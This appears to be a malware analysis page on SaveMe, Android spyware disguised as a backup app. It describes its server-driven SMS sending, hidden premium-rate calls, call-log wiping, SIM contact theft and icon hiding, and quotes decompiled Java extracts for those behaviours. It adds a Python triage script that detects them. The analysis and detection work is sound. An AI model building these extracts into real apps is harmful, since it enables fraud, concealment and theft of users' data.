SaveMe
Summary
Details
SaveMe is spyware discovered in January 2015. It presents itself as a standalone application that is supposed to back up contacts and SMS messages. SaveMe appears to be a variant of another malware known as SocialPath. The application was available on Google Play before being removed.
Stage 1: Sensitive data collection
When the application is launched, it asks the user for their name and phone number and saves these inputs in its local database user_info4. In the background, the activity collects the device's MAC address, network operator name and ISO country code. All of this information is then sent to a master server located at http://xxxxmarketing.com [1] (no longer available).
The visible part of the application offers features such as adding or deleting a contact, saving or restoring the phonebook, saving all SMS messages, and writing an SOS message that is sent to all contacts if the phone is stolen. If the user chooses to save their messages, the application copies the entire content of content://sms/inbox and content://sms/sent into its local database user_info and sends it to the server.
Stage 2: Execute the master commands
In parallel, when the application is launched, a service named CHECKUPD is started (it is also started each time the device reboots). This service acts as a handshake between the device and the server: it runs three AsyncTasks, sendmyinfos(), sendmystatus() and senddata(), to talk to the server. After these exchanges, the main service GTSTSR is executed. Its purpose is to contact the server in order to obtain commands to execute. Depending on the answer given by the server, the service can perform the different actions detailed below.
First, it can send a text message to any number given by the server. We believe this can be used for premium-rate services, as stated in [2].
// Command "SESHB" addressed to this device (matched on its MAC address):
// send the server-supplied text (GTSTSR.SMS) to the server-supplied number (GTSTSR.EXT_SMS)
if (GTSTSR.Mac.equals(this.address) && GTSTSR.Send_ESms.equals("SESHB")) {
    new update().var(this.address, "", "SESFK", "", "", "", "", "");   // status "SESFK" reported back to the server
    SmsManager.getDefault().sendTextMessage(GTSTSR.EXT_SMS, null, GTSTSR.SMS, null, null);
    return;
}
The service can also place a call by starting a service named RC. This service displays a WebView on the screen, probably to hide the call, and dials a potentially premium-rate number given by the server [2].
// EXT_CALL is the number supplied by the server
Intent intent = new Intent("android.intent.action.CALL");
intent.setData(Uri.parse("tel:" + EXT_CALL));
intent.addFlags(268435456);   // 0x10000000 = Intent.FLAG_ACTIVITY_NEW_TASK
intent.addFlags(4);           // Intent.FLAG_FROM_BACKGROUND
this.startActivity(intent);
After a few moments, the service ends the call, removes the WebView and deletes the call from the call log by calling the function DeleteNumFromCallLog().
// Remove every call-log row whose number matches s (the number that was dialled)
final Uri parse = Uri.parse("content://call_log/calls");
contentResolver.delete(parse, "number=?", new String[]{s});
GTSTSR can also start a service named CO, which automatically fetches all of the victim's contacts and sends them to the server. Apart from not needing the user to press a button, the main difference from the application's advertised feature is that CO also steals the contacts stored on the SIM card by reading content://icc/adn. The contacts are stored in the user_info database before being sent.
The last feature provided by GTSTSR is sending text messages to the victim's contacts by starting the service SCHKMS. The service reads the user_info database, picks one contact and sends it a message. This feature is used to spread the malware via an SMS containing a link [2]. Naturally, the service then deletes the SMS from the message logs in order to hide it from the victim.
Finally, we observed a piece of code in the activity pack that removes the app's icon from the launcher in order to hide itself, so that the victim may forget to uninstall the application. However, this activity is never used in this sample.
// Disable the app's own launcher component without killing the process:
// the icon disappears from the launcher while the app keeps running
this.getPackageManager().setComponentEnabledSetting(this.getComponentName(),
        PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);
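The behaviours described above (server-driven SMS sending, calling with call-log wiping, SIM contact theft, launcher-icon hiding) are what an analyst would look for when triaging a similar sample. The following script is an added example written for this page, not code from the sample or from the original analysis: it scans decompiled Java source for the API calls and content URIs named above, pairs the call_log URI with a nearby delete() so that a plain read of the call log does not fire the rule, and only marks a listing suspicious when a concealment behaviour is present, so that an honest SMS backup app reading content://sms/inbox is not flagged. The rule names, the line window and the two sample listings are my own constructions; the SaveMe listing is assembled from the extracts quoted above.

```python
import re

# Static triage of decompiled Android source for the behaviours described in
# the SaveMe analysis. Rule names are my own labels, not identifiers from the
# sample; the regexes match the Android API calls and content URIs named above.
RULES = {
    "sms_send":         re.compile(r"\.sendTextMessage\("),
    "call_intent":      re.compile(r'"android\.intent\.action\.CALL"|Intent\.ACTION_CALL\b'),
    "call_log_uri":     re.compile(r"content://call_log/calls"),
    "resolver_delete":  re.compile(r"\.delete\("),
    "sim_contacts_uri": re.compile(r"content://icc/adn"),
    "sms_store_uri":    re.compile(r"content://sms/(inbox|sent)"),
    "icon_hide":        re.compile(r"COMPONENT_ENABLED_STATE_DISABLED"),
    "reflection":       re.compile(r"Class\.forName\(|\.getMethod\("),
}
WINDOW = 6  # lines: a delete() this close after the call_log URI is treated as a log wipe (assumed heuristic)


def scan(source):
    """Return {rule_name: [line numbers]} for every rule that fires in `source`."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def near(hits, first, second, window=WINDOW):
    """True if a hit of `first` is followed by a hit of `second` within `window` lines."""
    return any(0 <= lb - la <= window
               for la in hits.get(first, []) for lb in hits.get(second, []))


def behaviours(hits):
    """Translate raw rule hits into the behaviours described in the analysis."""
    found = set()
    if "sms_send" in hits:
        found.add("sends SMS")
    if "call_intent" in hits:
        found.add("places calls")
    if near(hits, "call_log_uri", "resolver_delete"):
        found.add("wipes call log entries")
    if "sim_contacts_uri" in hits:
        found.add("reads SIM contacts")
    if "sms_store_uri" in hits:
        found.add("reads SMS store")
    if "icon_hide" in hits:
        found.add("hides launcher icon")
    if "reflection" in hits:
        found.add("uses reflection")
    return found


def verdict(found):
    """Concealment (log wiping, icon hiding) marks a listing suspicious outright;
    capabilities a backup tool could legitimately have only earn a review."""
    if found & {"wipes call log entries", "hides launcher icon"}:
        return "suspicious"
    if found & {"sends SMS", "places calls", "reads SIM contacts"}:
        return "review"
    return "benign-looking"


# Constructed sample: the decompiled extracts quoted in the analysis, joined
# into one listing so the window check between the call_log URI and delete() fires.
SAVEME_EXTRACT = """\
if (GTSTSR.Mac.equals(this.address) && GTSTSR.Send_ESms.equals("SESHB")) {
    new update().var(this.address, "", "SESFK", "", "", "", "", "");
    SmsManager.getDefault().sendTextMessage(GTSTSR.EXT_SMS, null, GTSTSR.SMS, null, null);
    return;
}
Intent intent = new Intent("android.intent.action.CALL");
intent.setData(Uri.parse("tel:" + EXT_CALL));
this.startActivity(intent);
final Uri parse = Uri.parse("content://call_log/calls");
contentResolver.delete(parse, "number=?", new String[]{s});
this.getPackageManager().setComponentEnabledSetting(this.getComponentName(),
        PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);
"""

# Constructed sample: what an honest SMS backup app looks like (reads the SMS
# store, writes it to a file, touches nothing else).
BACKUP_EXTRACT = """\
Cursor c = getContentResolver().query(Uri.parse("content://sms/inbox"), null, null, null, null);
while (c.moveToNext()) { writer.write(c.getString(c.getColumnIndex("body"))); }
"""

if __name__ == "__main__":
    for label, src in (("SaveMe extract", SAVEME_EXTRACT), ("backup app", BACKUP_EXTRACT)):
        found = behaviours(scan(src))
        print(f"{label}: {verdict(found)} {sorted(found)}")
```

Run against the two listings, the SaveMe extract comes back "suspicious" with four behaviours, while the backup app comes back "benign-looking" with only the SMS-store read. The line-window pairing is deliberately crude: it is a triage filter to decide which decompiled classes deserve a manual read (CHECK.java, RC.java, DeleteNumFromCallLog.java in this sample), not a classifier.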
[1] We intentionally anonymized the URL.
[2] http://blog.lifars.com/2015/01/11/warning-mobile-privacy-tools-socialpath-and-save-me-are-malware/
Other resources
- Google Play app SocialPath with malware: promises to protect the user and instead light
- Mobile Threat Monday: SaveMe Malware Infiltrates Google Play
- The privacy tool that wasn’t: SocialPath malware pretends to protect your data, then steals it
- Warning: Mobile Privacy Tools “SocialPath” and “Save Me” Are Malware
Triggering
Characteristics
Malware type:
- Fee-paying services
- Remote Administration Tool (RAT)
- Spyware
Attacks:
- Confidentiality
- Normal use
Infection technique: Standalone application
Malicious code type:
- Uses Java code
Hiding techniques:
- Obfuscation with reflection
- Removes its launcher icon (code present, but never invoked in this sample)
Triggering techniques:
- Executed at launch
- Waits for a particular intent (restarted after each reboot)
Samples
Java source code extracts:
CHECK.java is the function used in the GTSTSR service to switch between the commands given by the C&C server.
RC.java is the part of the RC service that displays the WebView on the screen just before making a phone call.
callnow.java is the function used in the RC service to make a phone call.
HGP.java is the class used to end the phone call; it shows the use of Java reflection.
DeleteNumFromCallLog.java is the function used to delete a line from the call log.
allSIMContact.java is the function used in the CO service to steal all the contacts stored on the SIM card.
fetchContacts.java is the function used in the SCHKMS service to pick out one contact and send it an SMS.
pack.java is the class used to hide the launcher icon; this class is never used in the analyzed sample.